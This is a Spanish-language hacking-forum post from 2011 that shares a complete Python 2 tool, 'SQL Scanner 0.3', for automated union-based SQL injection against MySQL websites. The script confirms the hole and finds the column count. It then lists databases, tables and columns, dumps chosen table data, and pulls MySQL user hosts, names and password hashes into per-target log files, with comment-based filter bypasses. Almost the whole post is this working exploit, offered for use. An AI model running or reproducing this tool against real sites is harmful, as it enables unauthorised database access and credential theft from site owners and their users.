send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[Python] SQL Scanner 0.3

  • 0 Respuestas
  • 2423 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BigBear

  • *
  • Underc0der
  • Mensajes: 544
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil
« en: Julio 03, 2011, 09:36:57 pm »
Bueno este es un simple scanner en python que hice para SQLI

Con las sig opciones :

  • Verifica vulnerabilidad
  • Busca columnas
  • Busca el numero milagroso y saca info sobre la DB
  • Saca tablas y columnas de de la DB actual o otra externa
  • Dumpear usuarios
  • Guarda todo en un log con el nombre de la web en la carpeta /logs
Código: Python
  1. #!usr/bin/python
  2. #SQL Scanner 0.3 (C) Doddy Hackman 2010
  3.  
  4. import os,sys,urllib2,re,binascii
  5. from urlparse import urlparse
  6.  
  7. def clean():
  8.  if sys.platform=="win32":
  9.   os.system("cls")
  10.  else:
  11.   os.system("clear")
  12.  
  13. def savefile(name,text):
  14.  file = open(name,"a")
  15.  file.write("\n"+text+"\n")
  16.  file.close()
  17.  
  18. def gethost(test):
  19.  return urlparse(test).netloc
  20.  
  21. def header() :
  22.  print "\n--== SQL Scanner ==--\n"
  23.  
  24. def copyright() :
  25.  print "\n\n(C) Doddy Hackman 2010\n"
  26.  sys.exit(1)
  27.  
  28. def show() :
  29.  print "\n[*] Sintax : ",sys.argv[0]," <web>\n"
  30.  
  31. def toma(web) :
  32.  nave = urllib2.Request(web)
  33.  nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
  34.  op = urllib2.build_opener()
  35.  return op.open(nave).read()
  36.  
  37. def bypass(bypass):
  38.  if bypass == "--":
  39.   return("+","--")
  40.  elif bypass == "/*":
  41.   return("/**/","/*")
  42.  else:
  43.   return("+","--")
  44.  
  45.  
  46. def dumper(web,passx,table,col1,col2):
  47.  
  48.  pass1,pass2 = bypass(passx)
  49.  web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
  50.  web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,0x4B3042524131,"+col2+",0x4B3042524131)))",web)
  51.  code1 = toma(web1+pass1+"from"+pass1+table+pass2)
  52.  print "\n\n[+] Searching values\n\n"
  53.  if (re.findall("K0BRA(.*?)K0BRA",code1)):
  54.   numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  55.   numbers = numbers[0]
  56.   print "[+] Values Found : ",numbers,"\n"     
  57.   for counter in range(0,int(numbers)):
  58.    code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+repr(counter)+",1"+pass2)    
  59.    if (re.findall("K0BRA(.*?)K0BRA",code2)):
  60.     c1 = re.findall("K0BRA(.*?)K0BRA",code2)
  61.     c1 = c1[0]
  62.  
  63.     c2 = re.findall("K0BRA1(.*?)K0BRA1",code2)
  64.     c2 = c2[0]
  65.     print "["+col1+"] : "+c1
  66.     print "["+col2+"] : "+c2+"\n"
  67.     savefile("logs/"+gethost(web)+".txt","["+col1+"] : "+c1)
  68.     savefile("logs/"+gethost(web)+".txt","["+col2+"] : "+c2+"\n")
  69.  else:
  70.   print "[-] Not Found\n"
  71.  
  72.  
  73.  
  74. def mysqluser(web,passx):
  75.  pass1,pass2 = bypass(passx)
  76.  web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
  77.  web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))",web)
  78.  code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
  79.  print "\n\n[+] Searching mysql.user\n\n"
  80.  if (re.findall("K0BRA(.*?)K0BRA",code1)):
  81.   numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  82.   numbers = numbers[0]
  83.   print "[+] mysql.user : ON"
  84.   savefile("logs/"+gethost(web)+".txt","[+] mysql.user : ON")
  85.   savefile("logs/"+gethost(web)+".txt","[+] Users Found : "+numbers+"\n")
  86.   print "[+] Users Found : ",numbers,"\n"      
  87.   for counter in range(0,int(numbers)):
  88.    code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  89.    if (re.findall("K0BRA(.*?)K0BRA",code2)):
  90.     host = re.findall("K0BRA(.*?)K0BRA",code2)
  91.     host = host[0]
  92.  
  93.     user = re.findall("K0BRA1(.*?)K0BRA1",code2)
  94.     user = user[0]
  95.  
  96.     passw = re.findall("K0BRA2(.*?)K0BRA2",code2)
  97.     passw = passw[0]
  98.     savefile("logs/"+gethost(web)+".txt","[Host] : "+host)
  99.     savefile("logs/"+gethost(web)+".txt","[User] : "+user)
  100.     savefile("logs/"+gethost(web)+".txt","[Pass] : "+passw+"\n")
  101.     print "[Host] : "+host
  102.     print "[User] : "+user
  103.     print "[Pass] : "+passw+"\n"    
  104.  else:
  105.   print "[-] Not Found\n"
  106.  
  107.  
  108.  
  109. def showcolumnsdb(web,db,table,passx):
  110.  db = "0x"+str(binascii.hexlify(db))
  111.  table = "0x"+str(binascii.hexlify(table))
  112.  pass1,pass2 = bypass(passx)
  113.  web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
  114.  web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
  115.  code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass2) 
  116.  print "\n\n[+] Searching columns in DB\n\n"
  117.  if (re.findall("K0BRA(.*?)K0BRA",code1)):
  118.   numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  119.   numbers = numbers[0]
  120.   savefile("logs/"+gethost(web)+".txt","[DB] : "+db)
  121.   savefile("logs/"+gethost(web)+".txt","[DB] : "+table)
  122.   print "[+] information_schema : ON"
  123.   print "[+] Columns Found : ",numbers,"\n"    
  124.   for counter in range(0,int(numbers)):
  125.    code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  126.    if (re.findall("K0BRA(.*?)K0BRA",code2)):
  127.     column = re.findall("K0BRA(.*?)K0BRA",code2)
  128.     column = column[0]
  129.     savefile("logs/"+gethost(web)+".txt","[Column Found] : "+column)
  130.     print "[Column Found] : "+column
  131.  
  132.  else:
  133.   print "[-] Not Found\n"
  134.  
  135.  
  136. def showtablesdb(web,db,passx):
  137.  db = "0x"+str(binascii.hexlify(db))
  138.  pass1,pass2 = bypass(passx)
  139.  web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
  140.  web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
  141.  code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass2)
  142.  print "\n\n[+] Searching tables in DB\n\n"
  143.  savefile("logs/"+gethost(web)+".txt","[DB] : "+db)
  144.  if (re.findall("K0BRA(.*?)K0BRA",code1)):
  145.   numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  146.   numbers = numbers[0]
  147.   print "[+] information_schema : ON"
  148.   print "[+] Tables Found : ",numbers,"\n"     
  149.   for counter in range(0,int(numbers)):
  150.    code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  151.    
  152.    if (re.findall("K0BRA(.*?)K0BRA",code2)):
  153.     table = re.findall("K0BRA(.*?)K0BRA",code2)
  154.     table = table[0]
  155.     print "[Table Found] : "+table
  156.     savefile("logs/"+gethost(web)+".txt","[Table Found] : "+table)
  157.  else:
  158.   print "[-] Not Found\n"
  159.  
  160.  
  161.  
  162. def showtables(web,passx):
  163.  pass1,pass2 = bypass(passx)
  164.  web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))",web)
  165.  web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
  166.  code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
  167.  print "\n\n[+] Searching tables\n\n"
  168.  if (re.findall("K0BRA(.*?)K0BRA",code1)):
  169.   numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  170.   numbers = numbers[0]
  171.   print "[+] information_schema : ON"
  172.   print "[+] Tables Found : ",numbers,"\n"     
  173.   for counter in range(17,int(numbers)):
  174.    code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  175.    if (re.findall("K0BRA(.*?)K0BRA",code2)):
  176.     table = re.findall("K0BRA(.*?)K0BRA",code2)
  177.     table = table[0]
  178.     print "[Table Found] : "+table
  179.     savefile("logs/"+gethost(web)+".txt","[Table Found] : "+table)
  180.  else:
  181.   print "[-] Not Found\n"
  182.  
  183.  
  184.  
  185. def showcolumns(tabla,web,passx):
  186.  pass1,pass2 = bypass(passx)
  187.  tabla = "0x"+str(binascii.hexlify(tabla))
  188.  web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))",web)
  189.  web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
  190.  code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass2)
  191.  print "\n\n[+] Searching tables\n\n"
  192.  savefile("logs/"+gethost(web)+".txt","[Table Found] : "+tabla)
  193.  if (re.findall("K0BRA(.*?)K0BRA",code1)):
  194.   numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  195.   numbers = numbers[0]
  196.   print "[+] information_schema : ON"
  197.   print "[+] Columns Found : ",numbers,"\n"    
  198.   for counter in range(0,int(numbers)):
  199.    code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  200.    if (re.findall("K0BRA(.*?)K0BRA",code2)):
  201.     column = re.findall("K0BRA(.*?)K0BRA",code2)
  202.     column = column[0]
  203.     print "[Column Found] : "+column
  204.     savefile("logs/"+gethost(web)+".txt","[Column Found] : "+column)
  205.  else:
  206.   print "[-] Not Found\n"
  207.  
  208.  
  209.  
  210.  
  211. def showdbs(web,passx):
  212.  pass1,pass2 = bypass(passx)
  213.  web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
  214.  web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))",web)
  215.  code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2)
  216.  print "\n\n[+] Searching DBS\n\n"
  217.  if (re.findall("K0BRA(.*?)K0BRA",code1)):
  218.   numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  219.   numbers = numbers[0]
  220.   print "[+] information_schema : ON"
  221.   print "[+] DBS Found : ",numbers,"\n"
  222.   for counter in range(0,int(numbers)):
  223.    code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  224.    if (re.findall("K0BRA(.*?)K0BRA",code2)):
  225.     db = re.findall("K0BRA(.*?)K0BRA",code2)
  226.     db = db[0]
  227.     print "[DB Found] : "+db
  228.     savefile("logs/"+gethost(web)+".txt","[DB Found] : "+db)
  229.  else:
  230.   print "[-] Not Found\n"
  231.  
  232.  
  233.  
  234.  
  235. def menu(page,bypass):
  236.  clean()
  237.  header()
  238.  print "\n[+] Target : ",page,"\n"
  239.  print "\n[information_schema]\n\n"
  240.  print "1 - Show tables\n"
  241.  print "2 - Show columns of the a table\n"
  242.  print "3 - Show databases\n"
  243.  print "4 - Show tables from the a DB\n"
  244.  print "5 - Show columns from the a table of the DB\n"
  245.  print "\n[mysql.user]\n\n"
  246.  print "6 - Show users\n"
  247.  print "\n[Others]\n\n"
  248.  print "7 - Show details\n"
  249.  print "8 - Dump data\n"
  250.  print "9 - Show log\n"
  251.  print "10 - Change target\n"
  252.  print "11 - Exit\n\n"
  253.  try:
  254.   op = input("[Option] : ")
  255.   if op == 1:
  256.    showtables(page,bypass)
  257.    raw_input()    
  258.    menu(page,bypass)
  259.   elif op == 2:
  260.    table = raw_input("\n\n[Table] : ")
  261.    showcolumns(table,page,bypass)
  262.    raw_input()
  263.    menu(page,bypass)
  264.   elif op == 3:
  265.    showdbs(page,bypass)
  266.    raw_input()
  267.    menu(page,bypass)
  268.   elif op == 4:
  269.    db = raw_input("\n\n[DB] : ")
  270.    showtablesdb(page,db,bypass)
  271.    raw_input()
  272.    menu(page,bypass)
  273.   elif op == 5:
  274.    db = raw_input("\n\n[DB] : ")
  275.    table = raw_input("\n\n[Table] : ")
  276.    showcolumnsdb(page,db,table,bypass)
  277.    raw_input()
  278.    menu(page,bypass)
  279.   elif op == 6:
  280.    mysqluser(page,bypass)
  281.    raw_input()
  282.    menu(page,bypass)
  283.   elif op == 7:
  284.    more(page,bypass)
  285.    raw_input()
  286.    menu(page,bypass)   
  287.   elif op == 8:
  288.    table = raw_input("\n\n[Table] : ")
  289.    col1 = raw_input("\n\n[Column 1] : ")
  290.    col2 = raw_input("\n\n[Column 2] : ")
  291.    dumper(page,bypass,table,col1,col2)
  292.    raw_input()
  293.    menu(page,bypass)
  294.   elif op == 9:
  295.    os.system("start logs/"+gethost(page)+".txt")
  296.    menu(page,bypass)
  297.   elif op == 10:
  298.    sta()
  299.  except:
  300.   menu(page,bypass)
  301.  if op == 11:
  302.   copyright()
  303.  
  304.  
  305. def more(web,passx):
  306.  pass1,pass2 = bypass(passx)
  307.  print "\n[+] Searching more data\n"
  308.  web1 = re.sub("hackman","unhex(hex(concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)))",web)
  309.  code0 = toma(web1+pass2)
  310.  if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)):
  311.   datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)
  312.   datar = re.split("K0BRA",datax[0])
  313.   print "[+] Username :",datar[1]
  314.   print "[+] Database :",datar[2]
  315.   print "[+] Version :",datar[3],"\n"
  316.   savefile("logs/"+gethost(web)+".txt","[+] Username : "+datar[1])
  317.   savefile("logs/"+gethost(web)+".txt","[+] Database : "+datar[2])
  318.   savefile("logs/"+gethost(web)+".txt","[+] Version : "+datar[3]+"\n")
  319.  code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
  320.  if (re.findall("K0BRA",code1)):
  321.    print "[+] mysql.user : on"
  322.    savefile("logs/"+gethost(web)+".txt","[+] mysql.user : on")
  323.  code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
  324.  if (re.findall("K0BRA",code2)):
  325.    print "[+] information_schema.tables : on"
  326.    savefile("logs/"+gethost(web)+".txt","[+] information_schema.tables : on")
  327.  
  328. def findlength(web,passx):
  329.  pass1,pass2 = bypass(passx)
  330.  print "\n[+] Finding columns length"
  331.  number = "unhex(hex(concat(0x4b30425241,1,0x4b30425241)))"
  332.  for te in range(2,30):
  333.   number = str(number)+","+"unhex(hex(concat(0x4b30425241,"+str(te)+",0x4b30425241)))"
  334.   code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+number+pass2)
  335.   if (re.findall("K0BRA(.*?)K0BRA",code)):
  336.    numbers = re.findall("K0BRA(.*?)K0BRA",code)
  337.    print "[+] Column length :",te
  338.    print "[+] Numbers",numbers,"print data"
  339.    sql = ""
  340.    tex = te + 1
  341.    for sqlix in range(2,tex):
  342.     sql = str(sql)+","+str(sqlix)
  343.     sqli  = str(1)+sql
  344.    sqla = re.sub(numbers[0],"hackman",sqli)
  345.    savefile("logs/"+gethost(web)+".txt","[Target] : "+web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla)
  346.    menu(web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla,passx)
  347.  
  348.  print "[-] Length dont found\n"
  349.    
  350.    
  351. def scan(web,passx):
  352.  pass1,pass2 = bypass(passx)
  353.  print "\n\n[+] Testing vulnerability"
  354.  code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+"1"+pass2)
  355.  if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
  356.   print "[+] SQLI Detected"
  357.   findlength(web,passx)
  358.  else:
  359.   print "[-] Not Vulnerable"
  360.   copyright()
  361.  
  362.  
  363. def sta():
  364.  
  365.  clean()
  366.  header()
  367.  
  368.  web = raw_input("\n\n[Page] : ")
  369.  bypasx = raw_input("\n\n[Bypass] : ")
  370.  scan(web,bypasx)
  371.  
  372. sta()
  373.  
  374. #The End
  375.  
« Última modificación: Julio 07, 2011, 07:03:09 pm por Sthefano02 »

 

¿Te gustó el post? COMPARTILO!



[Código] Yardas a metros - Metros a yardas [Python]

Iniciado por LucaSthefano

Respuestas: 0
Vistas: 1133
Último mensaje Mayo 29, 2011, 01:27:34 am
por LucaSthefano
[Código] Entero / No Entero [Ejercicio - Python]

Iniciado por LucaSthefano

Respuestas: 0
Vistas: 1092
Último mensaje Mayo 29, 2011, 01:24:09 am
por LucaSthefano
Python Trojan - By "bLiNdFiR3"

Iniciado por d33k40

Respuestas: 1
Vistas: 1742
Último mensaje Abril 03, 2010, 11:01:59 pm
por Dharok
Python phpmyadmin "BruteForce"

Iniciado por linkgl

Respuestas: 2
Vistas: 2178
Último mensaje Agosto 19, 2011, 12:14:37 pm
por linkgl
Python keylogger - by "bLiNdFiR3"

Iniciado por d33k40

Respuestas: 0
Vistas: 1720
Último mensaje Abril 07, 2010, 03:30:22 am
por d33k40